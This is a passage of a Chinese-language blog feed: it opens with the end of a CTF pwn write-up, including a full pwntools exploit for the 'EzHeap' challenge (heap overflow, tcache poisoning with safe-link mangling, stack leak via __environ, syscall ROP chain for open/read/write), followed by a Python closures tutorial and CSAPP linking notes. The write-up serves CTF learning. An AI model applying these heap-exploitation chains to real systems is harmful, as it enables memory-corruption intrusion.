one_gadget_offset</span><br><span class="line">info(<span class="string">f'one_gadget: <span class="subst">{<span class="built_in">hex</span>(one_gadget)}</span>'</span>)</span><br><span class="line">realloc = libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line">info(<span class="string">f'realloc: <span class="subst">{<span class="built_in">hex</span>(realloc)}</span>'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># overwrite __malloc_hook and __realloc_hook</span></span><br><span class="line">delete()</span><br><span class="line">edit(<span class="number">0x68</span>, p64(fake_bin_addr) + p64(fake_bin_addr) + <span class="string">b'\n'</span>)</span><br><span class="line">add(<span class="number">0x68</span>, cyclic(<span class="number">0x68</span>))</span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">0xb</span> + p64(one_gadget) + p64(realloc)</span><br><span class="line">add(<span class="number">0x68</span>, payload + <span class="string">b'\n'</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p, '')</span></span><br><span class="line">p.send(<span class="string">b'1'</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></tbody></table></figure>

<p>get shell 并得到 flag ：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{2a6de11d-8a93-484d-9444-7d1046c55134}</span><br></pre></td></tr></tbody></table></figure>

<h3 id="EzHeap"><a href="#EzHeap" class="headerlink" title="EzHeap"></a>EzHeap</h3><p>我刚开始放 payload 的堆选了0x80大小，根本放不下 ROP chain ，直接导致比赛结束时没来得及将这题做完，赛后十来分钟改了个大小就打通了。</p>
<p>又一道堆题，但是使用 seccomp 限制了系统调用：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">$ seccomp-tools dump ./EzHeap</span><br><span class="line"> line  CODE  JT   JF      K</span><br><span class="line">=================================</span><br><span class="line"> 0000: 0x20 0x00 0x00 0x00000004  A = <span class="built_in">arch</span></span><br><span class="line"> 0001: 0x15 0x00 0x09 0xc000003e  <span class="keyword">if</span> (A != ARCH_X86_64) goto 0011</span><br><span class="line"> 0002: 0x20 0x00 0x00 0x00000000  A = sys_number</span><br><span class="line"> 0003: 0x35 0x00 0x01 0x40000000  <span class="keyword">if</span> (A &lt; 0x40000000) goto 0005</span><br><span class="line"> 0004: 0x15 0x00 0x06 0xffffffff  <span class="keyword">if</span> (A != 0xffffffff) goto 0011</span><br><span class="line"> 0005: 0x15 0x04 0x00 0x00000000  <span class="keyword">if</span> (A == <span class="built_in">read</span>) goto 0010</span><br><span class="line"> 0006: 0x15 0x03 0x00 0x00000001  <span class="keyword">if</span> (A == write) goto 0010</span><br><span class="line"> 0007: 0x15 0x02 0x00 0x00000002  <span class="keyword">if</span> (A == open) goto 0010</span><br><span class="line"> 0008: 0x15 0x01 0x00 0x0000000a  <span class="keyword">if</span> (A == mprotect) goto 0010</span><br><span class="line"> 0009: 0x15 0x00 0x01 0x0000003c  <span class="keyword">if</span> (A != <span class="built_in">exit</span>) goto 0011</span><br><span class="line"> 0010: 0x06 0x00 0x00 0x7fff0000  <span class="built_in">return</span> ALLOW</span><br><span class="line"> 0011: 0x06 0x00 0x00 0x00000000  <span class="built_in">return</span> KILL</span><br></pre></td></tr></tbody></table></figure>

<p>因此很容易想到先用 <code>mprotect</code> 更改页面权限，然后 orw 直接读 flag。但是我最后没有使用 <code>mprotect</code> ，直接在栈上构造 ROP chain 来进行 orw 。</p>
<p>分析程序，发现漏洞：</p>
<ol>
<li>极大 heap overflow </li>
<li>输入无 0 截断可导致相邻内存泄漏</li>
</ol>
<p>而且最多允许我们 <code>malloc</code> 80个堆块，因此应该有不少利用方法。我主要利用 <a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/tcache_poisoning.c">tcache poisoning</a> 。攻击思路如下：</p>
<ul>
<li><p>首先利用堆溢出和相邻内存泄露，通过程序内已经有的 unsorted bins 等堆块，泄露 libc 和 heap 地址</p>
</li>
<li><p>计算 libc 中 <code>__environ</code> 的地址，利用 tcache poisoning 获得该地址处的堆块进行读，泄露 stack 地址</p>
<p>libc 版本为2.35，因此要手动 <a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/decrypt_safe_linking.c">safe link</a> </p>
</li>
<li><p>在某个堆块中写入 <code>flag\x00</code> 用于 orw ，搜集 gadgets 构造 ROP chain 。值得注意的是不能直接调用库函数 orw ，因为库函数的<code>open</code> 往往使用 <code>openat</code> 系统调用，会被禁止。因此我直接选择全部使用 <code>syscall ; ret</code>  gadget ，这也是导致我 payload 巨大的原因。</p>
</li>
<li><p>在 <code>malloc_heap</code> 操作对应函数的 <code>ret</code> 处下断点，计算此时 stack 地址与泄露 stack 地址的偏移，然后再利用 tcache poisoning 获得目标地址附近（<code>target_stack-0x8</code>，因为要16字节对齐且不能破坏canary）的堆块进行写。payload 为 8 字节的 rbp 填充加上 ROP chain 。<code>malloc_heap</code> 返回时会被劫持到该 ROP chain 。</p>
</li>
</ul>
<p>exp 如下：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.binary = binary = ELF(<span class="string">'./EzHeap'</span>)</span><br><span class="line">libc = binary.libc</span><br><span class="line"><span class="comment"># context.log_level = 'critical'</span></span><br><span class="line"></span><br><span class="line">libc_offset = <span class="number">0x21ace0</span></span><br><span class="line">heap_offset = <span class="number">0x1040</span></span><br><span class="line">tcache_50_offset = <span class="number">0x4d0</span></span><br><span class="line">tcache_110_offset = <span class="number">0x2420</span></span><br><span class="line">heap_flag_offset = <span class="number">0x2420</span></span><br><span class="line">stack_offset = <span class="number">0x170</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># p = binary.process()</span></span><br><span class="line">p = remote(<span class="string">'8.147.133.76'</span>, <span class="number">13951</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>():</span><br><span class="line">    p.recvuntil(<span class="string">b'choice &gt;&gt; '</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">malloc_heap</span>(<span class="params">size, content</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'size:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    p.recvuntil(<span class="string">b'content:'</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">free_heap</span>(<span class="params">index</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'idx:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit_heap</span>(<span class="params">index, size, content</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'3'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'idx:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.recvuntil(<span class="string">b'size:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    p.recvuntil(<span class="string">b'content:'</span>)</span><br><span class="line">    p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show_heap</span>(<span class="params">index</span>):</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'4'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'idx:'</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exit_program</span>():</span><br><span class="line">    menu()</span><br><span class="line">    p.sendline(<span class="string">b'5'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">mangle</span>(<span class="params">pos, ptr, page_offset=<span class="number">0</span></span>):</span><br><span class="line">    <span class="keyword">return</span> ((pos &gt;&gt; <span class="number">12</span>) + page_offset) ^ ptr</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">demangle</span>(<span class="params">ptr, page_offset=<span class="number">0</span></span>):</span><br><span class="line">    pos = (ptr &gt;&gt; <span class="number">12</span>) + page_offset</span><br><span class="line">    m = pos ^ ptr</span><br><span class="line">    <span class="keyword">return</span> m &gt;&gt; <span class="number">24</span> ^ m</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">leak_heap_libc</span>():</span><br><span class="line">    <span class="keyword">global</span> heap_leak, libc_leak</span><br><span class="line">    <span class="comment"># idx 0</span></span><br><span class="line">    malloc_heap(<span class="number">0x40</span>, <span class="string">b'A'</span>*<span class="number">0x40</span>)</span><br><span class="line">    edit_heap(<span class="number">0</span>, <span class="number">0x50</span>, <span class="string">b'A'</span>*<span class="number">0x50</span>)</span><br><span class="line">    show_heap(<span class="number">0</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'A'</span>*<span class="number">0x50</span>)</span><br><span class="line">    libc_leak = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>))</span><br><span class="line">    edit_heap(<span class="number">0</span>, <span class="number">0xd0</span>, <span class="string">b'B'</span>*<span class="number">0xd0</span>)</span><br><span class="line">    show_heap(<span class="number">0</span>)</span><br><span class="line">    p.recvuntil(<span class="string">b'B'</span>*<span class="number">0xd0</span>)</span><br><span class="line">    heap_leak = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>))</span><br><span class="line">    payload = <span class="string">b'A'</span>*<span class="number">0x40</span> + p64(<span class="number">0</span>) + p64(<span class="number">0xa1</span>) + p64(libc_leak) + p64(libc_leak)</span><br><span class="line">    payload = payload.ljust(<span class="number">0xd0</span>, <span class="string">b'\x00'</span>)</span><br><span class="line">    edit_heap(<span class="number">0</span>, <span class="number">0xd0</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">### stage1: leak libc and heap</span></span><br><span class="line">leak_heap_libc()</span><br><span class="line">info(<span class="string">f'[LEAK] heap_leak: <span class="subst">{<span class="built_in">hex</span>(heap_leak)}</span>'</span>)</span><br><span class="line">info(<span class="string">f'[LEAK] libc_leak: <span class="subst">{<span class="built_in">hex</span>(libc_leak)}</span>'</span>)</span><br><span class="line">libc.address = libc_leak - libc_offset</span><br><span class="line">heap_base = heap_leak - heap_offset</span><br><span class="line">info(<span class="string">f'[CALC] libc_base: <span class="subst">{<span class="built_in">hex</span>(libc.address)}</span>'</span>)</span><br><span class="line">info(<span class="string">f'[CALC] heap_base: <span class="subst">{<span class="built_in">hex</span>(heap_base)}</span>'</span>)</span><br><span class="line">environ_addr = libc.sym[<span class="string">'__environ'</span>]</span><br><span class="line">info(<span class="string">f'[CALC] environ_addr: <span class="subst">{<span class="built_in">hex</span>(environ_addr)}</span>'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">### stage2: leak stack</span></span><br><span class="line"><span class="comment"># idx1</span></span><br><span class="line">malloc_heap(<span class="number">0x40</span>, <span class="string">b'B'</span>*<span class="number">0x40</span>)</span><br><span class="line"><span class="comment"># idx2</span></span><br><span class="line">malloc_heap(<span class="number">0x40</span>, <span class="string">b'C'</span>*<span class="number">0x40</span>)</span><br><span class="line">free_heap(<span class="number">2</span>)</span><br><span class="line">free_heap(<span class="number">1</span>)</span><br><span class="line">mangled_environ_addr = mangle(heap_base + tcache_50_offset, environ_addr - <span class="number">0x40</span>)</span><br><span class="line">info(<span class="string">f'[CALC] mangled_environ_addr: <span class="subst">{<span class="built_in">hex</span>(mangled_environ_addr)}</span>'</span>)</span><br><span class="line">payload = <span class="number">0x40</span> * <span class="string">b'A'</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x51</span>) + p64(mangled_environ_addr)</span><br><span class="line">edit_heap(<span class="number">0</span>, <span class="number">0x58</span>, payload)</span><br><span class="line"><span class="comment"># idx1</span></span><br><span class="line">malloc_heap(<span class="number">0x40</span>, <span class="string">b'B'</span>*<span class="number">0x40</span>)</span><br><span class="line"><span class="comment"># idx2(environ_addr - 0x40)</span></span><br><span class="line">malloc_heap(<span class="number">0x40</span>, <span class="string">b'C'</span>*<span class="number">0x40</span>)</span><br><span class="line">show_heap(<span class="number">2</span>)</span><br><span class="line">p.recvuntil(<span class="string">b'C'</span>*<span class="number">0x40</span>)</span><br><span class="line">stack_leak = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>))</span><br><span class="line">info(<span class="string">f'[LEAK] stack_leak: <span class="subst">{<span class="built_in">hex</span>(stack_leak)}</span>'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">### stage3: overwrite stack with rop chain</span></span><br><span class="line"><span class="comment"># idx3</span></span><br><span class="line">malloc_heap(<span class="number">0x100</span>, <span class="string">b'D'</span>*<span class="number">0x100</span>)</span><br><span class="line"><span class="comment"># idx4</span></span><br><span class="line">malloc_heap(<span class="number">0x100</span>, <span class="string">b'E'</span>*<span class="number">0x100</span>)</span><br><span class="line"><span class="comment"># idx5</span></span><br><span class="line">malloc_heap(<span class="number">0x100</span>, <span class="string">b'F'</span>*<span class="number">0x100</span>)</span><br><span class="line">free_heap(<span class="number">5</span>)</span><br><span class="line">free_heap(<span class="number">4</span>)</span><br><span class="line">target_stack = stack_leak - stack_offset</span><br><span class="line">info(<span class="string">f'[CALC] target_stack: <span class="subst">{<span class="built_in">hex</span>(target_stack)}</span>'</span>)</span><br><span class="line">mangled_stack = mangle(heap_base + tcache_110_offset, target_stack-<span class="number">0x8</span>)</span><br><span class="line">info(<span class="string">f'[CALC] mangled_stack: <span class="subst">{<span class="built_in">hex</span>(mangled_stack)}</span>'</span>)</span><br><span class="line">payload = <span class="number">0x100</span> * <span class="string">b'A'</span> + p64(<span class="number">1</span>) + p64(<span class="number">0x91</span>) + p64(mangled_stack)</span><br><span class="line">edit_heap(<span class="number">3</span>, <span class="number">0x118</span>, payload)</span><br><span class="line"><span class="comment"># idx4</span></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">malloc_heap(<span class="number">0x100</span>, <span class="string">b'flag\x00'</span>.ljust(<span class="number">0x100</span>, <span class="string">b'\x00'</span>))</span><br><span class="line"><span class="comment"># idx5(target_stack-0x20)</span></span><br><span class="line">payload = p64(stack_leak)</span><br><span class="line">flag_addr = heap_base + heap_flag_offset</span><br><span class="line">rop = ROP(libc)</span><br><span class="line"><span class="comment"># raw orw</span></span><br><span class="line">syscall_gadget = rop.find_gadget([<span class="string">'syscall'</span>, <span class="string">'ret'</span>]).address</span><br><span class="line">pop_rax = rop.find_gadget([<span class="string">'pop rax'</span>, <span class="string">'ret'</span>]).address</span><br><span class="line">pop_rdi = rop.find_gadget([<span class="string">'pop rdi'</span>, <span class="string">'ret'</span>]).address</span><br><span class="line">pop_rsi = rop.find_gadget([<span class="string">'pop rsi'</span>, <span class="string">'ret'</span>]).address</span><br><span class="line"><span class="comment"># pop_rdx = rop.find_gadget(['pop rdx', 'ret']).address</span></span><br><span class="line">pop_rdx_r12 = libc.address + <span class="number">0x000000000011f2e7</span></span><br><span class="line"><span class="comment"># open('flag.txt', 0, 0)</span></span><br><span class="line">payload += p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(<span class="number">0</span>) + p64(pop_rdx_r12) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)+ p64(pop_rax) + p64(<span class="number">2</span>) + p64(syscall_gadget)</span><br><span class="line"><span class="comment"># read(3, target_stack+0x100, 0x100)</span></span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">3</span>) + p64(pop_rsi) + p64(target_stack+<span class="number">0x100</span>) + p64(pop_rdx_r12) + p64(<span class="number">0x100</span>) + p64(<span class="number">0</span>)+ p64(pop_rax) + p64(<span class="number">0</span>) + p64(syscall_gadget)</span><br><span class="line"><span class="comment"># write(1, target_stack+0x100, 0x100)</span></span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">1</span>) + p64(pop_rsi) + p64(target_stack+<span class="number">0x100</span>) + p64(pop_rdx_r12) + p64(<span class="number">0x100</span>) + p64(<span class="number">0</span>)+ p64(pop_rax) + p64(<span class="number">1</span>) + p64(syscall_gadget)</span><br><span class="line">payload += rop.chain()</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>, <span class="string">b'\x00'</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p, 'b *$rebase(0x16cd)')</span></span><br><span class="line">malloc_heap(<span class="number">0x100</span>, payload)</span><br><span class="line">flag = p.recvuntil(<span class="string">b'}'</span>)</span><br><span class="line">success(<span class="string">f'[FLAG] <span class="subst">{flag.decode()}</span>'</span>)</span><br></pre></td></tr></tbody></table></figure>

<p>最后得到 flag ：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="code"><pre><span class="line">flag{c9112d19-27e3-41ec-9957-fefb3f109229}</span><br></pre></td></tr></tbody></table></figure>]]></content>
      <categories>
        <category>CTF</category>
      </categories>
      <tags>
        <tag>PWN</tag>
        <tag>Crypto</tag>
        <tag>Misc</tag>
        <tag>Reverse</tag>
      </tags>
  </entry>
  <entry>
    <title>谈谈闭包</title>
    <url>/posts/closure/</url>
    <content><![CDATA[<p>在学习JS的过程中，我遇到了闭包这个概念，当时并没有在意。直到最近我开始自学python，在廖雪峰老师的python教程中又一次看到了这个名词，我才意识到闭包其实是一个重要的概念，或者说特性，许多高级语言支持闭包（比如近些年比较火的Go语言）。于是我查看了相关文档、教程，打算谈谈我对闭包的一些认识。<span id="more"></span></p>
<h2 id="闭包的定义"><a href="#闭包的定义" class="headerlink" title="闭包的定义"></a>闭包的定义</h2><p>闭包有许多不同的定义，个人认为最简洁而达意的是<a href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Closures#%E9%97%AD%E5%8C%85">MDN</a>对于闭包的定义：</p>
<blockquote>
<p><strong>闭包</strong>（closure）是一个函数以及其捆绑的周边环境状态（<strong>lexical environment</strong>，<strong>词法环境</strong>）的引用的组合。换而言之，闭包让开发者可以从内部函数访问外部函数的作用域。</p>
</blockquote>
<h2 id="词法环境"><a href="#词法环境" class="headerlink" title="词法环境"></a>词法环境</h2><p>维基百科这样描述闭包中的词法环境：</p>
<blockquote>
<p>环境里是若干对符号和值的对应关系，它既要包括<a href="https://zh.wikipedia.org/wiki/%E7%BA%A6%E6%9D%9F%E5%8F%98%E9%87%8F">约束变量</a>（该函数内部绑定的符号），也要包括<a href="https://zh.wikipedia.org/wiki/%E8%87%AA%E7%94%B1%E5%8F%98%E9%87%8F">自由变量</a>（在函数外部定义但在函数内被引用），有些函数也可能没有自由变量。</p>
</blockquote>
<p>简单来说，词法环境包含两部分：</p>
<ul>
<li>环境记录：存储符号-值对</li>
<li>对外部环境的引用：对父级词法环境的引用。</li>
</ul>
<p>也就是说，一个函数的词法环境包含了在函数中的符号定义和函数外部的词法环境。考虑如下python代码：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">init</span>():</span><br><span class="line">    name = <span class="string">"BeaCox"</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">displayName</span>():</span><br><span class="line">        greeting = <span class="string">"Hello"</span></span><br><span class="line">        <span class="built_in">print</span>(greeting+<span class="string">', '</span>+name)</span><br><span class="line">    displayName()</span><br><span class="line">init()</span><br></pre></td></tr></tbody></table></figure>

<p><code>displayName</code>函数的词法环境包含了环境记录（<code>greeting</code>的符号-值对）以及对外部环境的引用（<code>name</code>和<code>displayName</code>的符号-值对），这也就是在<code>displayName</code>函数中可以访问<code>name</code>变量的原因。执行<code>displayName</code>函数，其实就是创建了一个闭包。</p>
<h2 id="使用闭包"><a href="#使用闭包" class="headerlink" title="使用闭包"></a>使用闭包</h2><p>看完上面的例子，好像有点迷糊了：这不就是“内层作用域可以访问外层作用域的变量”吗？C++不支持闭包，不也能完成上面的工作吗？这是因为上面的例子并没有展示出闭包函数与词法环境<strong>捆绑</strong>的特性。将上面的代码稍加改动：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">init</span>():</span><br><span class="line">    name = <span class="string">"BeaCox"</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">displayName</span>():</span><br><span class="line">        greeting = <span class="string">"Hello"</span></span><br><span class="line">        <span class="built_in">print</span>(greeting+<span class="string">', '</span>+name)</span><br><span class="line">    <span class="keyword">return</span> displayName</span><br><span class="line">outsideDisplay=init()</span><br><span class="line">outsideDisplay()</span><br></pre></td></tr></tbody></table></figure>

<p>这段代码与上面不同的地方在于，<code>displayName</code>函数并不在<code>init</code>函数中执行，而是作为返回值，在<code>init</code>函数外部，有一个<code>outsideDisplay</code>接收了这个返回值。<br>如果我们从C++的思想来考虑这段代码，会发现：在<code>init</code>函数执行完后，局部变量<code>name</code>已经被回收，这时候<code>outsideDisplay</code>中<code>name</code>变量是没有被定义的，这段代码应该不能正常运行。<br>然而，我们运行这段python程序后会发现，终端正常输出<code>Hello, BeaCox</code>，这就是闭包的魔力！</p>
<p>这段程序之所以正常运行的原因，就是<code>python</code>中返回函数会形成闭包。闭包是由函数以及声明该函数的词法环境组合而成的。该环境包含了这个闭包创建时作用域内的任何局部变量。在本例子中，<code>outsideDisplay</code> 是执行 <code>init</code> 时创建的 <code>displayName</code> 函数实例的引用。<code>displayName</code> 函数和其捆绑的<strong>词法环境</strong>（变量 <code>name</code> 存在于其中）的引用形成了一个闭包，因此<code>init</code>函数执行完毕后，该词法环境没有消失，变量<code>name</code>也没有被回收。因此，当 <code>outsideDisplay</code> 被调用时，变量 <code>name</code> 仍然可用，程序能够正确运行。</p>
<h2 id="闭包的用途"><a href="#闭包的用途" class="headerlink" title="闭包的用途"></a>闭包的用途</h2><h3 id="模拟公有成员函数对私有变量的操作"><a href="#模拟公有成员函数对私有变量的操作" class="headerlink" title="模拟公有成员函数对私有变量的操作"></a>模拟公有成员函数对私有变量的操作</h3><p>读完上述代码不难发现，<code>outsideDisplay</code>函数在<code>init</code>函数外部调用，但却访问到了<code>init</code>函数内部的变量。这与C++中，调用类的公有成员函数来操作类的私有变量非常相似。与C++不同，python不存在严格意义上的私有变量，python通过以双下划线为开头来命名变量的方式，实现的是一种伪私有变量，它<strong>不应该</strong>被从外部访问，而不是<strong>不能</strong>被从外部访问。python、JavaScript等不支持严格私有变量的语言可以通过创建闭包来模拟公有成员函数对私有变量的操作</p>
<h3 id="创建一个生命周期极长的局部变量"><a href="#创建一个生命周期极长的局部变量" class="headerlink" title="创建一个生命周期极长的局部变量"></a>创建一个生命周期极长的局部变量</h3><p>观察上述例子，<code>outsideDisplay</code>函数可以继续重复运行，直到整个程序终止。也就是说<code>name</code>变量直到程序运行结束之前，都一直存在于内存中。听起来貌似很像全局变量，但这个变量却是一个局部变量。仅这个程序而言，这个变量只能被<code>outsideDisplay</code>函数和<code>init</code>函数访问。</p>
<h2 id="闭包可能导致的问题"><a href="#闭包可能导致的问题" class="headerlink" title="闭包可能导致的问题"></a>闭包可能导致的问题</h2><h3 id="内存泄漏"><a href="#内存泄漏" class="headerlink" title="内存泄漏"></a>内存泄漏</h3><blockquote>
<p> <em>内存泄漏</em>（Memory Leak）是指程序中已动态分配的堆内存由于某种原因程序未释放或无法释放，造成系统内存的浪费，导致程序运行速度减慢甚至系统崩溃等严重后果。</p>
</blockquote>
<p>上文提到，闭包可以创建一个生命周期极长（直到程序运行结束前始终留存在内存中）的变量，如果这样的变量过多，就会导致程序运行速度减慢甚至系统崩溃。</p>
<h3 id="在循环中创建闭包导致意料之外的错误"><a href="#在循环中创建闭包导致意料之外的错误" class="headerlink" title="在循环中创建闭包导致意料之外的错误"></a>在循环中创建闭包导致意料之外的错误</h3><p>廖雪峰老师的python教程中给出了一个这样的例子：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">count</span>():</span><br><span class="line">    fs = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">4</span>)://i从<span class="number">1</span>到<span class="number">3</span></span><br><span class="line">        <span class="keyword">def</span> <span class="title function_">f</span>():</span><br><span class="line">             <span class="keyword">return</span> i*i</span><br><span class="line">        fs.append(f)</span><br><span class="line">    <span class="keyword">return</span> fs</span><br><span class="line"></span><br><span class="line">f1, f2, f3 = count()</span><br></pre></td></tr></tbody></table></figure>

<p>这段程序的期望目标是f1, f2, f3分别返回1，4，9。实际返回9, 9, 9。这是因为每个<code>f()</code>函数捆绑外部词法环境中的<code>i</code>是对<code>i</code>的引用，在<code>return fs</code>之前，<code>i</code>已经变成3了，因此每个<code>f()</code>函数返回的都是<code>3*3</code>。</p>
<p>因此，要尽量避免在循环中创建闭包。如若必需，务必要谨慎！</p>
]]></content>
      <categories>
        <category>前端</category>
      </categories>
      <tags>
        <tag>javascript</tag>
        <tag>python</tag>
      </tags>
  </entry>
  <entry>
    <title>《深入理解计算机系统》第7章：链接 阅读报告</title>
    <url>/posts/csapp-7/</url>
    <content><![CDATA[<p>这篇文章是阅读《深入理解计算机系统》第7章：链接后写下的，很多地方写得并不详细，也无法保证完全正确。主要是为了记录我学习链接相关知识的过程，仅供参考。<span id="more"></span></p>
<h2 id="什么是链接？"><a href="#什么是链接？" class="headerlink" title="什么是链接？"></a>什么是链接？</h2><blockquote>
<p> 链接是将各种代码和数据片段收集并组合成为一个单一文件的过程，这个文件可被加载（复制）到内存并执行。</p>
</blockquote>
<p>链接可以执行于编译时、加载时、运行时。</p>
<h2 id="编译器驱动程序"><a href="#编译器驱动程序" class="headerlink" title="编译器驱动程序"></a>编译器驱动程序</h2><blockquote>
<p>大多数编译系统提供<em>编译器驱动程序</em>(compile driver)，它代表用户在需要时调用语言预处理器、编译器、汇编器和链接器。</p>
</blockquote>
<p>用GNU编译系统构造程序时，我们调用<em>GCC</em>(GNU Compiler Collection)驱动程序。</p>
<p>GCC有几个常用的参数：</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>-c</td>
<td>将源文件编译成目标文件但不链接</td>
</tr>
<tr>
<td>-d</td>
<td>在执行过程中打印出所有的调试信息</td>
</tr>
<tr>
<td>-S</td>
<td>将源文件编译成汇编代码，不进行汇编和链接</td>
</tr>
<tr>
<td>-E</td>
<td>只对源文件进行预处理，不进行编译、汇编、链接</td>
</tr>
<tr>
<td>-o <file></file></td>
<td>指明输出文件名为file</td>
</tr>
<tr>
<td>-g</td>
<td>打开调试开关，让编译的目标文件有调试信息</td>
</tr>
<tr>
<td>-O0, -O1, -O2,  -O3</td>
<td>控制代码优化强度，-O3最强</td>
</tr>
</tbody></table>
<h3 id="举个例子"><a href="#举个例子" class="headerlink" title="举个例子"></a>举个例子</h3><div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/76109/2/16891/41270/634eb075E6fd16631/69483619f038e331.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/76109/2/16891/41270/634eb075E6fd16631/69483619f038e331.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/76109/2/16891/41270/634eb075E6fd16631/69483619f038e331.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>要通过上图源程序一步步构造成一个完全链接的可执行目标文件，需要以下几步：</p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://kjimg10.360buyimg.com/ott/jfs/t1/142246/13/30131/62256/634eb089Ea60c594d/79eeb7a61ab032f2.png" data-fancybox="default" data-caption="undefined"><img fancybox="" itemprop="contentUrl" src="https://kjimg10.360buyimg.com/ott/jfs/t1/142246/13/30131/62256/634eb089Ea60c594d/79eeb7a61ab032f2.png" class="lazyload" data-srcset="https://kjimg10.360buyimg.com/ott/jfs/t1/142246/13/30131/62256/634eb089Ea60c594d/79eeb7a61ab032f2.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="></a><span></span></div></div>
<p>每一步对应如下代码：</p>
<figure class="highlight shell"><table><tbody><tr><td class="code"><pre><span class="line">gcc -E -o main.i main.c # 预处理</span><br><span class="line">gcc -S -o main.s main.i # 编译</span><br><span class="line">as -o main.o main.s # 汇编</span><br><span class="line">ld -static -o prog main.o sum.o # 链接</span><br></pre></td></tr></tbody></table></figure>

<h2 id="可重定位目标文件"><a href="#可重定位目标文件" class="headerlink" title="可重定位目标文件"></a>可重定位目标文件</h2><p>如图所示是典型的ELF可重定位目标文件的格式。</p>
